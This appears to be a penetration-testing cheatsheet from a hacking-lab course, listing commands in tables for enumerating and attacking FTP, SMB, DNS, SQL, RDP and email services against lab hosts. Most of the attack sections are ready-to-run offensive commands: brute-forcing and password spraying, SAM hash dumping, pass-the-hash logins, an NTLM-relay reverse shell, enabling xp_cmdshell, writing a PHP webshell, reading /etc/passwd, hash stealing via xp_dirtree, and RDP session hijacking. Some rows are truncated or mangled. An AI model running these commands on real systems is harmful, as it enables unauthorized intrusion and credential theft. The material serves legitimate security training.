Foothold Cheatsheet
Initial Foothold
In technical workflows, efficiency often hinges on recalling precise commands, flags, or syntax. These cheatsheets condense essential tools, techniques, and workflows into actionable quick-reference guides, designed to save time and reduce friction. Whether you’re scanning networks, automating tasks, or troubleshooting systems, use this curated collection as your “initial foothold” for rapid execution—eliminating guesswork and keeping critical information at your fingertips. Bookmark, print, or memorize these shortcuts to streamline your process and stay focused on results.
Infrastructure-based Enumeration
| Command | Description |
|---|---|
| curl -s https://crt.sh/?q=&output=json | jq . |
| for i in $(cat ip-addresses.txt);do shodan host $i;done | Scan each IP address in a list using Shodan. |
Host-based Enumeration
FTP
| Command | Description |
|---|---|
| ftp <FQDN/IP> | Interact with the FTP service on the target. |
| nc -nv <FQDN/IP> 21 | Interact with the FTP service on the target. |
| telnet <FQDN/IP> 21 | Interact with the FTP service on the target. |
| openssl s_client -connect <FQDN/IP>:21 -starttls ftp | Interact with the FTP service on the target using encrypted connection. |
| wget -m –no-passive ftp://anonymous:anonymous@ | Download all available files on the target FTP server. |
SMB
| Command | Description |
|---|---|
| smbclient -N -L //<FQDN/IP> | Null session authentication on SMB. |
| smbclient //<FQDN/IP>/ | Connect to a specific SMB share. |
| rpcclient -U "" <FQDN/IP> | Interaction with the target using RPC. |
| samrdump.py <FQDN/IP> | Username enumeration using Impacket scripts. |
| smbmap -H <FQDN/IP> | Enumerating SMB shares. |
| crackmapexec smb <FQDN/IP> –shares -u ’’ -p '' | Enumerating SMB shares using null session authentication. |
| enum4linux-ng.py <FQDN/IP> -A | SMB enumeration using enum4linux. |
NFS
| Command | Description |
|---|---|
| showmount -e <FQDN/IP> | Show available NFS shares. |
| mount -t nfs <FQDN/IP>:/ ./target-NFS/ -o nolock | Mount the specific NFS share.umount ./target-NFS |
| umount ./target-NFS | Unmount the specific NFS share. |
DNS
| Command | Description |
|---|---|
| dig ns <domain.tld> @ | NS request to the specific nameserver. |
| dig any <domain.tld> @ | ANY request to the specific nameserver. |
| dig axfr <domain.tld> @ | AXFR request to the specific nameserver. |
| dnsenum –dnsserver –enum -p 0 -s 0 -o found_subdomains.txt -f ~/subdomains.list <domain.tld> | Subdomain brute forcing. |
SMTP
| Command | Description |
|---|---|
| telnet <FQDN/IP> 25 |
IMAP/POP3
| Command | Description |
|---|---|
| curl -k ‘imaps://<FQDN/IP>’ –user : | Log in to the IMAPS service using cURL. |
| openssl s_client -connect <FQDN/IP>:imaps | Connect to the IMAPS service. |
| openssl s_client -connect <FQDN/IP>:pop3s | Connect to the POP3s service. |
SNMP
| Command | Description |
|---|---|
| snmpwalk -v2c -c <FQDN/IP> | Querying OIDs using snmpwalk. |
| onesixtyone -c community-strings.list <FQDN/IP> | Bruteforcing community strings of the SNMP service. |
| braa @<FQDN/IP>:.1.* | Bruteforcing SNMP service OIDs. |
MySQL
| Command | Description |
|---|---|
| mysql -u -p -h <FQDN/IP> | Login to the MySQL server. |
MSSQL
| Command | Description |
|---|---|
| mssqlclient.py @<FQDN/IP> -windows-auth | Log in to the MSSQL server using Windows authentication. |
IPMI
| Command | Description |
|---|---|
| msf6 auxiliary(scanner/ipmi/ipmi_version) | IPMI version detection. |
| msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) | Dump IPMI hashes. |
Linux Remote Management
| Command | Description |
|---|---|
| ssh-audit.py <FQDN/IP> | Remote security audit against the target SSH service. |
| ssh @<FQDN/IP> | Log in to the SSH server using the SSH client. |
| ssh -i private.key @<FQDN/IP> | Log in to the SSH server using private key. |
| ssh @<FQDN/IP> -o PreferredAuthentications=password | Enforce password-based authentication. |
Windows Remote Management
| Command | Description |
|---|---|
| rdp-sec-check.pl <FQDN/IP> | Check the security settings of the RDP service. |
| xfreerdp /u: /p:"" /v:<FQDN/IP> | Log in to the RDP server from Linux. |
| evil-winrm -i <FQDN/IP> -u -p | Log in to the WinRM server. |
| wmiexec.py :""@<FQDN/IP> “” | Execute command using the WMI service. |
Oracle TNS
| Command | Description |
|---|---|
| ./odat.py all -s <FQDN/IP> | Perform a variety of scans to gather information about the Oracle database services and its components. |
| sqlplus /@<FQDN/IP>/ | Log in to the Oracle database. |
| ./odat.py utlfile -s <FQDN/IP> -d -U -P –sysdba –putFile C:\insert\path file.txt ./file.txt | Upload a file with Oracle RDBMS. |
Attacking FTP
| Command | Description |
|---|---|
| ftp 192.168.2.142 | Connecting to the FTP server using the ftp client. |
| nc -v 192.168.2.142 21 | Connecting to the FTP server using netcat. |
| hydra -l user1 -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.142 | Brute-forcing the FTP service. |
Attacking SMB
| Command | Description |
|---|---|
| smbclient -N -L //10.129.14.128 | Null-session testing against the SMB service. |
| smbmap -H 10.129.14.128 | Network share enumeration using smbmap. |
| smbmap -H 10.129.14.128 -r notes | Recursive network share enumeration using smbmap. |
| smbmap -H 10.129.14.128 –download “notes\note.txt” | Download a specific file from the shared folder. |
| smbmap -H 10.129.14.128 –upload test.txt “notes\test.txt” | Upload a specific file to the shared folder. |
| rpcclient -U’%’ 10.10.110.17 | Null-session with the rpcclient. |
| ./enum4linux-ng.py 10.10.11.45 -A -C | Automated enumeratition of the SMB service using enum4linux-ng. |
| crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p ‘Company01!’ | Password spraying against different users from a list. |
| impacket-psexec administrator:‘Password123!'@10.10.110.17 | Connect to the SMB service using the impacket-psexec. |
| crackmapexec smb 10.10.110.17 -u Administrator -p ‘Password123!’ -x ‘whoami’ –exec-method smbexec | Execute a command over the SMB service using crackmapexec. |
| crackmapexec smb 10.10.110.0/24 -u administrator -p ‘Password123!’ –loggedon-users | Enumerating Logged-on users. |
| crackmapexec smb 10.10.110.17 -u administrator -p ‘Password123!’ –sam | Extract hashes from the SAM database. |
| crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE | Use the Pass-The-Hash technique to authenticate on the target host. |
| impacket-ntlmrelayx –no-http-server -smb2support -t 10.10.110.146 | Dump the SAM database using impacket-ntlmrelayx. |
| impacket-ntlmrelayx –no-http-server -smb2support -t 192.168.220.146 -c ‘powershell -e | Execute a PowerShell based reverse shell using impacket-ntlmrelayx. |
Attacking SQL Databases
| Command | Description |
|---|---|
| mysql -u julio -pPassword123 -h 10.129.20.13 | Connecting to the MySQL server. |
| sqlcmd -S SRVMSSQL\SQLEXPRESS -U julio -P ‘MyPassword!’ -y 30 -Y 30 | Connecting to the MSSQL server. |
| sqsh -S 10.129.203.7 -U julio -P ‘MyPassword!’ -h | Connecting to the MSSQL server from Linux. |
| sqsh -S 10.129.203.7 -U .\julio -P ‘MyPassword!’ -h | Connecting to the MSSQL server from Linux while Windows Authentication mechanism is used by the MSSQL server. |
| mysql> SHOW DATABASES; | Show all available databases in MySQL. |
| mysql> USE htbusers; | Select a specific database in MySQL. |
| mysql> SHOW TABLES; | Show all available tables in the selected database in MySQL. |
| mysql> SELECT * FROM users; | Select all available entries from the “users” table in MySQL. |
| sqlcmd> SELECT name FROM master.dbo.sysdatabases | Show all available databases in MSSQL. |
| sqlcmd> USE htbusers | Select a specific database in MSSQL. |
| sqlcmd> SELECT * FROM htbusers.INFORMATION_SCHEMA.TABLES | Show all available tables in the selected database in MSSQL. |
| sqlcmd> SELECT * FROM users | Select all available entries from the “users” table in MSSQL. |
| sqlcmd> EXECUTE sp_configure ‘show advanced options’, 1 | To allow advanced options to be changed. |
| sqlcmd> EXECUTE sp_configure ‘xp_cmdshell’, 1 | To enable the xp_cmdshell. |
| sqlcmd> RECONFIGURE | To be used after each sp_configure command to apply the changes. |
| sqlcmd> xp_cmdshell ‘whoami’ | Execute a system command from MSSQL server. |
| mysql> SELECT “” INTO OUTFILE ‘/var/www/html/webshell.php’ | Create a file using MySQL. |
| mysql> show variables like “secure_file_priv”; | Check if the the secure file privileges are empty to read locally stored files on the system. |
| sqlcmd> SELECT * FROM OPENROWSET(BULK N’C:/Windows/System32/drivers/etc/hosts’, SINGLE_CLOB) AS Contents | Read local files in MSSQL. |
| mysql> select LOAD_FILE("/etc/passwd"); | Read local files in MySQL. |
| sqlcmd> EXEC master..xp_dirtree ‘\10.10.110.17\share' | Hash stealing using the xp_dirtree command in MSSQL. |
| sqlcmd> EXEC master..xp_subdirs ‘\10.10.110.17\share' | Hash stealing using the xp_subdirs command in MSSQL. |
| sqlcmd> SELECT srvname, isremote FROM sysservers | Identify linked servers in MSSQL. |
| sqlcmd> EXECUTE(‘select @@servername, @@version, system_user, is_srvrolemember(‘‘sysadmin’’)’) AT [10.0.0.12\SQLEXPRESS] | Identify the user and its privileges used for the remote connection in MSSQL. |
Attacking RDP
| Command | Description |
|---|---|
| crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c ‘password123’ | Password spraying against the RDP service. |
| hydra -L usernames.txt -p ‘password123’ 192.168.2.143 rdp | Brute-forcing the RDP service. |
| rdesktop -u admin -p password123 192.168.2.143 | Connect to the RDP service using rdesktop in Linux. |
| tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME} | Impersonate a user without its password. |
| net start sessionhijack | Execute the RDP session hijack. |
| reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f | Enable “Restricted Admin Mode” on the target Windows host. |
| xfreerdp /v:192.168.2.141 /u:admin /pth:A9FDFA038C4B75EBC76DC855DD74F0DA | Use the Pass-The-Hash technique to login on the target host without a password. |
Attacking DNS
| Command | Description |
|---|---|
| dig AXFR @ns1.inlanefreight.htb inlanefreight.htb | Perform an AXFR zone transfer attempt against a specific name server. |
| subfinder -d inlanefreight.com -v | Brute-forcing subdomains. |
| host support.inlanefreight.com | DNS lookup for the specified subdomain. |
Attacking Email Services
| Command | Description |
|---|---|
| host -t MX microsoft.com | DNS lookup for mail servers for the specified domain. |
| dig mx inlanefreight.com | grep “MX” |
| host -t A mail1.inlanefreight.htb. | DNS lookup of the IPv4 address for the specified subdomain. |
| telnet 10.10.110.20 25 | Connect to the SMTP server. |
| smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7 | SMTP user enumeration using the RCPT command against the specified host. |
| python3 o365spray.py –validate –domain msplaintext.xyz | Verify the usage of Office365 for the specified domain. |
| python3 o365spray.py –enum -U users.txt –domain msplaintext.xyz | Enumerate existing users using Office365 on the specified domain. |
| python3 o365spray.py –spray -U usersfound.txt -p ‘March2022!’ –count 1 –lockout 1 –domain msplaintext.xyz | Password spraying against a list of users that use Office365 for the specified domain. |
| hydra -L users.txt -p ‘Company01!’ -f 10.10.110.20 pop3 | Brute-forcing the POP3 service. |
| swaks –from notifications@inlanefreight.com –to employees@inlanefreight.com –header ‘Subject: Notification’ –body ‘Message’ –server 10.10.11.213 | Testing the SMTP service for the open-relay vulnerability. |